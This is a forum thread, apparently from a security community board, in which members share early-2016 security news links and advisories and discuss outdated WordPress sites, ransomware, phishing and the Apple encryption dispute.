Attackers can take over websites. 25% of websites run the WordPress CMS.
New WordPress hole, users should update asap:
https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Re commit: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
With WP all files are inside a public folder,
normally one should only have an index.php, a .htaccess file and CSS/JS/Images files in there.
polonus
And the WP site alreeady runs 4.5 :)
http://prntscr.com/9n5uva
-
Right you are, dear Steven, but you also have compatibility issues to reckon with, read: https://wordpress.org/support/topic/wordpress-version-and-php-compatibility & http://www.wpbeginner.com/beginners-guide/how-does-php-updates-by-your-web-host-impacts-your-wordpress-sites/ & https://wordpress.org/about/requirements/
pol
-
Pardon me but...every time I try to find the WP version using wappalyzer I can't find it.
What am I doing wrong? ??? Color me frustrated. ??? ::) ???
-
Pardon me but...every time I try to find the WP version using wappalyzer I can't find it.
What am I doing wrong? ??? Color me frustrated. ??? ::) ???
Wappalyzer sometimes cant get the version and you can also block the version number on Apache and some other softwares :)
Look at Wordpress.org with Wappalyzer, it should you a version number.
-
Hi Steven Winderlich and Para-Noid,
Easiest way is to go here: http://www.wpthemedetector.com/
Whenever you know there is WP used as CMS, do a scan here: hackertarget.com/wordpress-security-scan/
Here you can do a simple scan for version number, outdated WP plug-ins, whether there is major insecurity like user enumeration or directory listing enabled :o etc.
Use this bookmarklet: https://codex.wordpress.org/Press_This
The bookmark calls http://example.com/wp-admin/press-this.php?u=&t=&s=&i=
u = the url of the current page
t = the title of the current page
s = the text selection from the current page
i = url of an image file
Edit the bookmark within your browser to change the values passed if necessary.
polonus (volunteer website security analyst and website error-hunter)
-
They need to do some updates. http://prntscr.com/9nbs6q
Look at the NGinx version of Centos.org, or the Apache version on SUSE.com.......Its ridiculous.
@Damian: Check http://gsd-drolshagen.de/site/ on your link and look at the results.
-
Hi Steven Winderlich, you are right, see it now, some work to be done there by the admins.
WP - WP configuration:Custom. Web application version:
WordPress version: WordPress
Wordpress version from source: 4.0.9
Wordpress Version 4.0 based on: -http://gsd-drolshagen.de/site//wp-admin/js/common.js
WordPress directory: -http://gsd-drolshagen.de/site/wp-content
WordPress theme: -http://gsd-drolshagen.de/site/wp-content/themes/mutootheme/
Author:mutoo GmbH
Description:Template from mutoo
WordPress version outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 4.2
Plug-ins to be checked and updated
The following plugins were detected by reading the HTML source of the WordPress sites front page.
responsive-slider latest release (0.1.8)
http://alienwp.com/plugins/responsive-slider
nivo-slider
wp-google-maps latest release (6.3.04)
http://www.wpgmaps.com
contact-form-7 latest release (4.3.1)
http://contactform7.com/
But also jQuery library issues: -http://gsd-drolshagen.de
Detected libraries:
jquery-migrate - 1.2.1 : -http://gsd-drolshagen.de/site/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery - 1.11.1 : -http://gsd-drolshagen.de/site/wp-includes/js/jquery/jquery.js?ver=1.11.1
1 vulnerable library detected
polonus (volunteer website security analyst and website error-hunter)
-
@Damian: Remember this site? http://www.druckerei-hachenburg.de/
Still alot to update, IDIOTIC ADMINS I CAN SAY.
-
[Security-announce] NEW VMSA-2016-0001 VMware ESXi, Workstation, Player, and Fusion updates address important guest privilege escalation vulnerability
http://lists.vmware.com/pipermail/security-announce/2016/000316.html
-
Malvertising Campaign via Pop-under Ads Sends CryptoWall 4
https://blog.malwarebytes.org/malvertising-2/2016/01/malvertising-campaign-via-pop-under-ads-sends-cryptowall-4/?utm_source=gplus&utm_medium=social
Clickjacking Campaign Plays on European Cookie Law
https://blog.malwarebytes.org/fraud-scam/2016/01/clickjacking-campaign-plays-on-european-cookie-law/?utm_source=gplus&utm_medium=social
Was Mac OS X really the most vulnerable in 2015?
https://blog.malwarebytes.org/mac/2016/01/was-mac-os-x-really-the-most-vulnerable-in-2015/?utm_source=gplus&utm_medium=social
Stranger hacks family's baby monitor and talks to child at night (This one is really frightening.)
http://sfglobe.com/2016/01/06/stranger-hacks-familys-baby-monitor-and-talks-to-child-at-night/
-
A survey worth taking! (It's only three questions long.)
https://blog.malwarebytes.org/online-security/2016/01/survey-tell-us-what-you-think-about-our-pup-friday-posts/?utm_source=gplus&utm_medium=social
-
Nividea breaks Chrome Incognito:
https://charliehorse55.wordpress.com/2016/01/09/how-nvidia-breaks-chrome-incognito/
polonus
-
Nvidea breaks Chrome Incognito:
https://charliehorse55.wordpress.com/2016/01/09/how-nvidia-breaks-chrome-incognito/
polonus
Interesting read - aside from Nvidea - I guess Incognito doesn't mean anything like our interpretation to Google. But then again it never has been high up the privacy ratings with all that it captures.
-
Critical Hole in Trend-Micro's Password Manager: https://code.google.com/p/google-security-research/issues/detail?id=693
How can an AV-vendor implement a tool like this Password Manager without having it thoroughly tested by security experts ::)
polonus
-
Critical Hole in Trend-Micro's Password Manager: https://code.google.com/p/google-security-research/issues/detail?id=693 (https://code.google.com/p/google-security-research/issues/detail?id=693)
How can an AV-vendor implement a tool like this Password Manager without having it thoroughly tested by security experts ::)
polonus
I thought that they had experts at Trend Micro ???
-
The Windows Vaults
https://blog.malwarebytes.org/online-security/2016/01/the-windows-vaults/?utm_source=gplus&utm_medium=social
Microsoft revokes Windows 8's patch privileges today
http://www.networkworld.com/article/3021337/computers/microsoft-revokes-windows-8s-patch-privileges-today.html
-
FortiOS SSH Undocumented Interactive Login Vulnerability
https://www.fortiguard.com/advisory/fortios-ssh-undocumented-interactive-login-vulnerability
-
Microsoft Security Bulletin Summary for January 2016
https://technet.microsoft.com/en-us/library/security/ms16-jan.aspx
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
There is also a license/product exchange (outlined and link in the above) however, you have to be quick as the license exchange deal ends 31/1/2016.
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
There is also a license/product exchange (outlined and link in the above) however, you have to be quick as the license exchange deal ends 31/1/2016.
Yes I probably should have mentioned that :( I was unsure about posting the exchange link though due to direct competition.
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
There is also a license/product exchange (outlined and link in the above) however, you have to be quick as the license exchange deal ends 31/1/2016.
Yes I probably should have mentioned that :( I was unsure about posting the exchange link though due to direct competition.
Which is why I just mentioned it rather than give a direct link.
-
Your Gmail account is not a spy tool for Google
http://www.androidcentral.com/your-gmail-account-not-spy-tool-google
-
No one aware log-on data have been stolen...... :o :-[
Read: https://community.rapid7.com/community/infosec/blog/2016/01/13/get-the-2015-incident-detection-response-survey-results
See attached image...
pol
-
Nice analysis on what Asyn reported earlier here: Evil OpenSSH servers can steal your private login keys to other systems – patch now
Read: https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt
pol
-
LastPass attack called "LostPass": https://www.seancassidy.me/lostpass.html
polonus
-
A bad day for Trend Micro...
Password Manager flaw will hurt Trend Micro's reputation
http://www.networkworld.com/article/3023297/security/password-manager-flaw-will-hurt-trend-micros-reputation.html
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php (http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php)
There is also a license/product exchange (outlined and link in the above) however, you have to be quick as the license exchange deal ends 31/1/2016.
It would be nice if Avast would participate in this exchange.
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
OT: Goodbye Outpost and thanks for the lifetime license (http://dl7.glitter-graphics.net/pub/3303/3303437vdpbfh2160.gif) (http://www.glitter-graphics.com)
-
Oracle Critical Patch Update Advisory - January 2016
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
OT: Goodbye Outpost and thanks for the lifetime license <snip image>
Looks like they weren't talking about your lifetime ;D
Been using Outpost Firewall for even longer than avast.
-
Encrypt the web. Update - still much improvement needed:
https://www.eff.org/deeplinks/2013/11/encrypt-web-report-whos-doing-what
Image file: https://www.eff.org/files/2013/12/16/crypto-survey-graphic-20131216.png
polonus
P.S. Also read my reports from the HTTPS Everywhere Atlas that from time to time land in the "virus and worms" section of these here forums and all the prevailing issues I mention and all the constant unique IDs tracking going on all the time.
We live in an insecure digital world, my dear forum friends, we really do!
Wake up IT, patch, upgrade, retire and code secure.... :)
Damian
-
MSN Home Page Drops More Malware Via Malvertising
https://blog.malwarebytes.org/malvertising-2/2016/01/msn-home-page-drops-more-malware-via-malvertising/?utm_source=gplus&utm_medium=social
-
Yandex acquired Agnitum technology for Yandex Browser
Agnitum product support will cease December 31st 2016 http://www.agnitum.com/news/2016-01-14-yandex-acquired-agnitum-technology.php
OT: Goodbye Outpost and thanks for the lifetime license <snip image>
Looks like they weren't talking about your lifetime ;D
Been using Outpost Firewall for even longer than avast.
OT: I'm aware about that David because I'm a bit upset about this change over when I read this http://www.agnitum.com/migrate.php
What are you going too do David when you can no longer used your Outpost Pro FW any more.
-
<snip quotes>
OT: I'm aware about that David because I'm a bit upset about this change over when I read this http://www.agnitum.com/migrate.php
What are you going too do David when you can no longer used your Outpost Pro FW any more.
There is nothing to stop you continuing using it - just no more program updates - so I'm in no rush to find a replacement.
I would suggest you try and download the latest version if you didn't save the installation file.
-
Or look into the alternatives. http://alternativeto.net/software/outpost-firewall-pro/
I use Windows Firewall Control on Windows.
polonus
-
<snip quotes>
OT: I'm aware about that David because I'm a bit upset about this change over when I read this http://www.agnitum.com/migrate.php
What are you going too do David when you can no longer used your Outpost Pro FW any more.
There is nothing to stop you continuing using it - just no more program updates - so I'm in no rush to find a replacement.
I would suggest you try and download the latest version if you didn't save the installation file.
Don't worry David I have save my Outpost Pro installation file backup FW settings, and I've already download the latest version 20mins ago ;)
-
(http://screencast-o-matic.com/screenshots/u/Lh/1453383408263-60597.png)
It's a phishing attempt not a way for you to get $100.00 from McDonald's
-
Tech Support Scammers Lure Users With Fake Norton Warnings, Turn Out To Be Symantec Reseller
https://blog.malwarebytes.org/fraud-scam/2016/01/tech-support-scammers-lure-users-with-fake-norton-warnings-turn-out-to-be-symantec-reseller/?utm_source=gplus&utm_medium=social
-
Trojan for Android pre-installed. Philips pushes an update: http://news.drweb.com/show/?i=9792&lng=en&c=5
polonus
-
CryptoWall 4.0 Spreading via Angler Exploit Kit
http://www.securityweek.com/cryptowall-40-spreading-angler-exploit-kit
-
Linux malware: Second screen-grabbing Trojan surfaces in space of a week
http://www.zdnet.com/article/linux-malware-second-screen-grabbing-trojan-surfaces-in-space-of-a-week/
-
How many times we report various Word Press insecurities on websites: Outdated versions of the CMS, plug-ins, issues with themes, user enumeration and directory listing enabled :o etc. etc.
Now see where that could lead to: http://news.netcraft.com/archives/2016/01/21/brazil-gov-website-serving-up-phish-and-malware-again.html
Pondus, eddy, Para-Noid, polonus and many others continuously warning and warning, reporting and reporting in the "virus and worms" and this info all falls on deaf ears. When will those website admins finally get informed about what threats they may expose their visitors to ???
polonus (volunteer website security analyst and website error-hunter)
-
How many times we report various Word Press insecurities on websites: Outdated versions of the CMS, plug-ins, issues with themes, user enumeration and directory listing enabled :o etc. etc.
Now see where that could lead to: http://news.netcraft.com/archives/2016/01/21/brazil-gov-website-serving-up-phish-and-malware-again.html
Pondus, eddy, Para-Noid, polonus and many others continuously warning and warning, reporting and reporting in the "virus and worms" and this info all falls on deaf ears. When will those website admins finally get informed about what threats they may expose their visitors to ???
polonus (volunteer website security analyst and website error-hunter)
No wonder when they run outdated Debian, PHP and maybe more.
-
LeChiffre, Ransomware Ran Manually
https://blog.malwarebytes.org/intelligence/2016/01/draft-lechiffre-a-manually-run-ransomware/ (https://blog.malwarebytes.org/intelligence/2016/01/draft-lechiffre-a-manually-run-ransomware/)
-
Mozilla Delays Add-On Signing in Firefox Once Again
http://news.softpedia.com/news/mozilla-delays-add-ons-signing-in-firefox-once-again-499335.shtml
-
Security updates available for Foxit Reader and Foxit PhantomPDF 7.3
https://www.foxitsoftware.com/support/security-bulletins.php
-
[openssl-announce] Forthcoming OpenSSL releases
https://mta.openssl.org/pipermail/openssl-announce/2016-January/000058.html
-
Rogue Google Chrome Extension Spies On You
https://blog.malwarebytes.org/online-security/2016/01/rogue-google-chrome-extension-spies-on-you/?utm_source=Gplus&utm_medium=social
More Fake Facebook “Security System Page” Scams
https://blog.malwarebytes.org/fraud-scam/2016/01/more-fake-facebook-security-system-page-scams/?utm_source=Gplus&utm_medium=social
Hacking your head: How cyber criminals use social engineering
https://www.malwarebytes.org/articles/hacking-your-head-how-cyber-criminals-use-social-engineering/?utm_source=gplus&utm_medium=social
edit: additional
-
Magento vulnerable to Cross Scripting Attack: https://blog.sucuri.net/2016/01/security-advisory-stored-xss-in-magento.html
Long known flaw for which a patch exists: https://magento.com/security/patches/supee-7405
stiil a lot of websites with Magento may be vulnerable to such exploit.
polonus
-
Lenovo ShareIT Multiple Vulnerabilities
http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities
-
Whatever side wins, the end-user will loose: http://www.cbc.ca/news/business/microsoft-and-other-tech-giants-fight-u-s-right-to-seize-cloud-data-1.2677688
polonus
-
Javascript could really be bad and meaning big trouble depending on certain circumstances and where it may have access. For those that use it or evaluate it, read here and get some creeps: http://www.moock.org/lectures/troublewithjs/
polonus (volunteer website security analyst and website error-hunter)
-
Wave Goodbye to the Java Plugin (if you have not already)
http://www.ghacks.net/2016/01/29/wave-goodbye-to-the-java-plugin-if-you-have-not-already/
-
Elaborate iCloud Phish Used To Activate Stolen iPhones
https://blog.malwarebytes.org/phishing/2016/01/elaborate-icloud-phish-used-to-activate-stolen-iphones-2/?utm_source=gplus&utm_medium=social
Rotten Tomatoes, Jerusalem Post And Other Publishers Victim Of Ongoing Malvertising Campaign
https://blog.malwarebytes.org/malvertising-2/2016/01/rotten-tomatoes-jerusalem-post-and-other-publishers-victim-of-ongoing-malvertising-campaign/?utm_source=Gplus&utm_medium=social
App Update Tool Could Endanger iOS Users
https://blog.malwarebytes.org/mac/2016/01/app-update-tool-could-endanger-ios-users/?utm_source=gplus&utm_medium=social
-
@Para-Noid,
Dear Craig, these mal-ads were detected at: -rottentomatoes.com, -makeuseof.com, -lifebuzz.com, -fanatik.com.tr, -autoblog.com, -boredomtherapy.com, -leagueoflegends.wikia.com, -blitz.bg & -jpost.com. As to now it is unknown as to what extent these warned ad-networks has removed the infested ads.
your Avast forum friend,
Damian
P.S. Users are really better protected having a decent adblocker up and running ;)
-
P.S. Users are really better protected having a decent adblocker up and running ;)
And I find Adguard is a much better and stronger adblocker if I'm not mistaken Sherlock ;)
-
Hi SpeedyPC,
You take the words right out of my mouth.
I am beta testing Adguard and I can second
what you say there is the truth, the whole truth and nothing but the truth. ;)
polonus
-
VirusTotal: Putting the spotlight on firmware malware
http://blog.virustotal.com/2016/01/putting-spotlight-on-firmware-malware_27.html
-
Qihoo 360 inappropriate behavior
Testing bodies AV‐Comparatives, AV‐TEST and Virus Bulletin comment on
allegations of inappropriate behavior
pdf.doc > https://www.av-test.org/fileadmin/pdf/VB-AVC-AVT-press-release.pdf
-
MBAM vulnerable: https://blog.malwarebytes.org/news/2016/02/malwarebytes-anti-malware-vulnerability-disclosure/
Specific MBAM server and user software issues were found, but has not been revealed yet.
Remarkable a Google security staff member detects such issues and the MBAM security staff have not... :o
pol
-
MBAM vulnerable: https://blog.malwarebytes.org/news/2016/02/malwarebytes-anti-malware-vulnerability-disclosure/ (https://blog.malwarebytes.org/news/2016/02/malwarebytes-anti-malware-vulnerability-disclosure/)
Specific MBAM server and user software issues were found, but has not been revealed yet.
Remarkable a Google security staff member detects such issues and the MBAM security staff have not... :o
pol
Why is that remarkable ??? Google does have some pretty savvy people working for them. :)
-
Hi bob3160,
That was just now what I did not want to say. Maybe I phrased it so that people like you misunderstood.
Must be my Dutch line of making an argument... ;)
I really meant to say "Why had it just to be a Google Security Researcher, like Tavis Ormandy, who found these various MBAM security holes, while MBAM staff also have very qualified people, that did not detect the issues, while they were going over the MBAM server and client software?????" Are they coming into the same ICT class as Ormandy does. Are they wellwilling non-professional g33ks?
So it was just the other way round actually. I did not question the savviness of the Google Security Researcher as such, but rather the ability of the MBAM folks, but then when you are always with your eyes almost fixed onto the MBAM window-pane, you might miss out some wider scope, a form of "fixation" and reoccuring "attitudes". Or they are just second- or sub-class researchers.
Damian
-
It is always easier for a total outsider to look at things with clearer eyes.
I think this was the case with Google looking for vulnerabilities.
Wonder if the reverse would reveal something about Google's security or lack thereof ???
-
Hi bob3160,
Here we touch common ground, fully agree with you ;)
Damian
-
http://www.theregister.co.uk/2016/02/02/malwarebytes_0day/
-
Right you are, Eddy,
Ormandy has proven to be "a necessary irritant" for detecting the security shortcomings of anti-virus products, in software from Trend Micro, ESET, FireEye, Kaspersky and Avast security products.
polonus
-
This now raises the following question :
Till this vulnerably is plugged, is it safer to stop using MBAM or, should you still continue to use the product
despite the security holes ???
As far as I know, these vulnerabilities have not yet been exploited.
I also don't see this being discussed on their forum ???
-
@bob3160,
You would be extremely unlucky when you would be hit, as only targeted attacks would work as far as I have understood. MBAM will come up with a new version to update to any time now, and they also working furiously to mitigate the server-side issues Ormandy has reported. And bob3160 before you or whoever else here would come under fire the attackers have to pass Avast's defenses first and then they get caught between the front gate and the main gate I personally would not worry that much about a "walkthrough" with a MBAM update. See the additional problems: https://mxtoolbox.com/domain/www.malwarebytes.org/
MBAM's advisory on the issue: https://blog.malwarebytes.org/news/2016/02/malwarebytes-anti-malware-vulnerability-disclosure/
More to worry about now from Chromodo!
Uninstall costs you as much as installing, free: https://code.google.com/p/google-security-research/issues/detail?id=704
users who install Comodo Internet Security may not realize that their Chrome installation os replaced with Comodo's own browser, Chromodo.
That little bit of crapware isn't secure at all: it's set as the default browser, and "all shortcuts are replaced with Chromodo links and all settings, cookies, etc are imported from Chrome. They also hijack DNS settings, among other shady practices," Google's Tavis Ormandy notes.
Quoted here is: http://www.theregister.co.uk/2016/02/02/google_disses_chromodo/
polonus
-
Comodo and I have a long history as you probably already know. :)
I don't have to worry about their product and their vulnerabilities because I personally would never use any of their products.
-
Hi bob3160,
Well I have read enough about Comodo's to leave my fingers off of it. And now free Let's Encrypt has been targeted by cybercrooks to abuse it to secure and harden their malcreations. Yep, certainly the https everywhere mission has it's darker sides to it as well. Read here what Trend Micro's reports: http://www.theregister.co.uk/2016/01/07/net_scum_getting_lets_encrypt_certs_for_malware/
It is an insecure world, bob3160, and it is hard to come by just on a smile....
polonus
-
These types of offers are acted upon all too often:
(http://screencast-o-matic.com/screenshots/u/Lh/1454502213706-10244.png)
Clicking on that link, sends you here: (http://screencast-o-matic.com/screenshots/u/Lh/1454502895690-72064.png)which is certainly not connected to Amazon Prime or any other part of Amazon.
Hover your mouse over any descriptive link and you'll see the actual link address on the bottom left side of your screen.
It's almost always a dead giveaway of an attempted scam or Phishing attempt.
Be careful, it's a dangerous world out there. :o
-
http://www.theregister.co.uk/2016/02/04/dridex_botnet_pwned/ ;D
-
Hi Eddy this is a form of dedicated sink-holing then, ;D
Clever strategy, but counter-hacking malicious payload is a strange way of propagating an AV software.
I wonder if it isn't whitehat hacking with a tinge of blackhat activity to it,
especially if you neither would like to have Dridex nor Avira's.
According to Dutch law we call this "eigen richting" and it is not allowed according to our judiciary system.
polonus
-
Massive Admedia/Adverting iFrame Infection
WordPress under massive attack from hackers injecting encrypted code at the end of all legitimate .js files,
https://blog.sucuri.net/2016/02/massive-admedia-iframe-javascript-infection.html
link article author = Sucuri's Denis Sinegubko.
In case of this infection, the easiest way is to check any .js files if they have the malware at the very bottom.
Additional reason never to go without a decent adblocker and a cookie cruncher!
polonus
-
http://www.theregister.co.uk/2016/02/05/avast_spoons_browser_patch_as_google_cleaver_yells_your_forks_forked/
-
Fake Amazon Mail Phishes for Login, Payment Information
https://blog.malwarebytes.org/fraud-scam/2016/02/fake-amazon-mail-phishes-for-login-payment-information/?utm_source=Gplus&utm_medium=social
10 easy steps to clean your infected computer
https://www.malwarebytes.org/articles/10-easy-steps-to-clean-your-infected-computer/?utm_source=Gplus&utm_medium=social
BleepingComputer Defends Freedom of Speech
https://blog.malwarebytes.org/news/2016/02/bleepingcomputer-defends-freedom-of-speech/?utm_source=gplus&utm_medium=social
Gossip Site TMZ, Latest Victim of Malvertising Campaign
https://blog.malwarebytes.org/malvertising-2/2016/02/gossip-site-tmz-latest-victim-of-malvertising-campaign/?utm_source=gplus&utm_medium=social
-
Data breach in China: 100 million records used to hack 20 million Taobao users
https://nakedsecurity.sophos.com/2016/02/05/data-breach-in-china-100-million-records-used-to-hack-20-million-taobao-users/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29
-
Oracle Security Alert for CVE-2016-0603
http://www.oracle.com/technetwork/topics/security/alert-cve-2016-0603-2874360.html
-
DayZ in a Daze: Forum Breach Confirmed
https://blog.malwarebytes.org/hacking-2/2016/02/dayz-in-a-daze-forum-breach-confirmed/?utm_source=gplus&utm_medium=social
The Malware Museum offers a look at the viruses of yesteryear
http://www.slashgear.com/the-malware-museum-offers-a-look-at-the-viruses-of-yesteryear-06425817/
Mysterious spike in WordPress hacks silently delivers ransomware to visitors
http://arstechnica.com/security/2016/02/mysterious-spike-in-wordpress-hacks-silently-delivers-ransomware-to-visitors/
-
Steam uses an insecure version of Chrome without the sandbox: https://github.com/ValveSoftware/steam-for-linux/issues/4292
pol
-
Russian Ruble rate was manipulated by malware hackers: https://www.bloomberg.com/news/articles/2016-02-08/russian-hackers-moved-currency-rate-with-malware-group-ib-says
polonus
-
DMA Locker Strikes Back
https://blog.malwarebytes.org/intelligence/2016/02/dma-locker-strikes-back/
sample > ( 4 hours, 17 minutes ago )
https://www.virustotal.com/en/file/b7eeb0746b8e5df88c9937463db3f12a07ed3cf62ff720c6c91b8610080f2d9c/analysis/
-
Making email safer for you
http://gmailblog.blogspot.co.uk/2016/02/making-email-safer-for-you-posted-by.html
-
Microsoft Security Bulletin Summary for February 2016
https://technet.microsoft.com/en-us/library/security/ms16-feb
-
Play Your Part for a Better Internet
https://blog.malwarebytes.org/online-security/2016/02/play-your-part-for-a-better-internet/?utm_source=gplus&utm_medium=social
Malware: Understanding the enemy
http://www.itproportal.com/2016/02/10/malware-understanding-the-enemy/
-
Phishing campaign redirects users to a fake Netflix website and steals payment card details
http://www.arnnet.com.au/article/593898/cyber-criminals-hack-netflix-symantec/
-
How to Avoid Potentially Unwanted Programs
https://blog.malwarebytes.org/online-security/2016/02/how-to-avoid-potentially-unwanted-programs/?utm_source=gplus&utm_medium=social
-
posted 2013
Cyber Criminals Hate Brian Krebs So Much They Sent Heroin and SWAT Teams to His Home
http://www.vice.com/read/i-interviewed-the-fraudster-who-frames-people-for-heroin-possession
-
Hackers are holding a California hospital’s network hostage for $3.6 million
http://www.theverge.com/2016/2/15/11004794/california-ransomware-hospital
-
OSX Ransomware Offered for Sale in the Underground
http://www.infosecisland.com/blogview/24699-OSX-Ransomware-Offered-for-Sale-in-the-Underground.html
-
Hackers are holding a California hospital’s network hostage for $3.6 million
http://www.theverge.com/2016/2/15/11004794/california-ransomware-hospital (http://www.theverge.com/2016/2/15/11004794/california-ransomware-hospital)
Amazing that they don't have a viable backup in place. The Hospital also needs to take some of the blame
for not being more careful with their patience records.
-
U.S. federal magistrate judge ordered Apple to backdoor an iPhone.
Read: https://www.eff.org/deeplinks/2016/02/eff-support-apple-encryption-battle
Real security and the rights of customers is at stake.
polonus
-
U.S. federal magistrate judge ordered Apple to backdoor an iPhone.
Read: https://www.eff.org/deeplinks/2016/02/eff-support-apple-encryption-battle (https://www.eff.org/deeplinks/2016/02/eff-support-apple-encryption-battle)
Real security and the rights of customers is at stake.
polonus
So is national security. It will be interesting who wins this battle.
I'm not a betting man but don't hold out too much hope for our own personal privacy rights. :(
-
U.S. federal magistrate judge ordered Apple to backdoor an iPhone.
Read: https://www.eff.org/deeplinks/2016/02/eff-support-apple-encryption-battle (https://www.eff.org/deeplinks/2016/02/eff-support-apple-encryption-battle)
Real security and the rights of customers is at stake.
polonus
So is national security. It will be interesting who wins this battle.
I'm not a betting man but don't hold out too much hope for our own personal privacy rights. :(
If a back door already exists, then it should be allowed to be used on this individual case.
If, as Apple claims, such a tool doesn't exist, that the Feds. are asking to create a crack in the personal liberties armor.
I don't know how any one can be comfortable with that.
-
Yes, if this is all true the judge actually will have asked Apple to write a backdoor to their own propriety code that does not exist already to enable the brute force attack the government has in mind.
While they insist it is only and exclusively for mentioned case, there is no guarantee it won't spread and it is also undermining general security measures against criminals that come to abuse such a backdoor. There is at least one person comfortable with this order and that person is Donald Trump who now says: "We should have access to that iPhone" read: http://uk.businessinsider.com/donald-trump-apple-phone-san-bernardino-2016-2
polonus
-
Politics aside, I still wonder if such a tool wasn't created before the feature was made available. ???
-
Hi bob3160,
There is a lot of speculation about this.
Will we ever really know?
I doubt that very much.
polonus
-
WordPress Compromise Campaign: From Nuclear EK To Angler EK
https://blog.malwarebytes.org/exploits-2/2016/02/wordpress-compromise-campaign-from-nuclear-ek-to-angler-ek/?utm_source=gplus&utm_medium=social
A Message to Our Customers (Wasn't sure where to post this.)
http://www.apple.com/customer-letter/
edit: additional
-
Unfortunately I read the apple letter as a sales gimmick... By the iPhone and you can do what you like. We don't care we just want your money
-
Unfortunately I read the apple letter as a sales gimmick... By the iPhone and you can do what you like. We don't care we just want your money
I agree and I also think that the backdoor is already there just not something Apple wants to talk about. :)
-
Hackers are holding a California hospital’s network hostage for $3.6 million
http://www.theverge.com/2016/2/15/11004794/california-ransomware-hospital
Hospital pays $17,000 ransom to get access back to its encrypted files
http://www.networkworld.com/article/3034537/hospital-pays-17000-ransom-to-get-access-back-to-its-encrypted-files.html?token=%23tk.NWWNLE_nlt_networkworld_daily_news_alert_2016-02-18&idg_eid=52948c736ecce9e676edc4c93f707d83&utm_source=Sailthru&utm_medium=email&utm_campaign=NWW%20Daily%20AM%20Alert%202016-02-18&utm_term=networkworld_daily_news_alert#tk.NWW_nlt_networkworld_daily_news_alert_2016-02-18
-
Hackers are holding a California hospital’s network hostage for $3.6 million
http://www.theverge.com/2016/2/15/11004794/california-ransomware-hospital (http://www.theverge.com/2016/2/15/11004794/california-ransomware-hospital)
Hospital pays $17,000 ransom to get access back to its encrypted files
http://www.networkworld.com/article/3034537/hospital-pays-17000-ransom-to-get-access-back-to-its-encrypted-files.html?token=%23tk.NWWNLE_nlt_networkworld_daily_news_alert_2016-02-18&idg_eid=52948c736ecce9e676edc4c93f707d83&utm_source=Sailthru&utm_medium=email&utm_campaign=NWW%20Daily%20AM%20Alert%202016-02-18&utm_term=networkworld_daily_news_alert#tk.NWW_nlt_networkworld_daily_news_alert_2016-02-18 (http://www.networkworld.com/article/3034537/hospital-pays-17000-ransom-to-get-access-back-to-its-encrypted-files.html?token=%23tk.NWWNLE_nlt_networkworld_daily_news_alert_2016-02-18&idg_eid=52948c736ecce9e676edc4c93f707d83&utm_source=Sailthru&utm_medium=email&utm_campaign=NWW%20Daily%20AM%20Alert%202016-02-18&utm_term=networkworld_daily_news_alert#tk.NWW_nlt_networkworld_daily_news_alert_2016-02-18)
Another entity clearly not prepared for a disaster and not creating backups. You would expect this from a novice but not a hospital. :(
https://www.youtube.com/watch?v=hZy5in3WNe4
-
it could be that the encrypted data were short term but important for the treatments ...
sadly that talking in public about ransom payments will encourage more attacks on public service organizations
-
Comodo has put their users at risk through predictable passwords :o
https://twitter.com/taviso/status/700422594550325248
polonus
-
When penguins attack - Linux's role in the malware ecosystem
Nearly 80% of the servers online used for malicious web pages are using Unix or Linux hosts.
http://www.irongeek.com/i.php?page=videos/bsidesboston2015/200-when-penguins-attack-linuxs-role-in-the-malware-ecosystem-chester-wisniewski
-
This jQuery plug-in may enhance a lot of security issues on websites:
Issues could be critical. For instance here:
jquery-migrate - 1.2.1 : -http://www.wide-netzwerk.at/media/jui/js/jquery-migrate.min.js
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
Read: https://github.com/jquery/jquery-migrate/blob/master/warnings.md
and: https://stackoverflow.com/questions/21882731/how-to-use-jquery-migrate-plugin
polonus (volunteer website security analyst and website error-hunter)
-
Find My iPhone, iCloud Lead Cops to Kidnapped Teen
http://www.nbcnews.com/news/us-news/find-my-iphone-icloud-lead-cops-kidnapped-teen-n521486
-
What would happen if you used a longer passcode on your iPhone?
What if you use a longer passcode? Here’s how long the FBI would need:
seven-digit passcodes will take up to 9.2 days, and on average 4.6 days, to crack
eight-digit passcodes will take up to three months, and on average 46 days, to crack
nine-digit passcodes will take up to 2.5 years, and on average 1.2 years, to crack
10-digit passcodes will take up to 25 years, and on average 12.6 years, to crack
11-digit passcodes will take up to 253 years, and on average 127 years, to crack
12-digit passcodes will take up to 2,536 years, and on average 1,268 years, to crack
13-digit passcodes will take up to 25,367 years, and on average 12,683 years, to crack
article quote author = Mac Slavo.
pol
-
Free Youtube Downloader PUP is just another Tech Support Scam
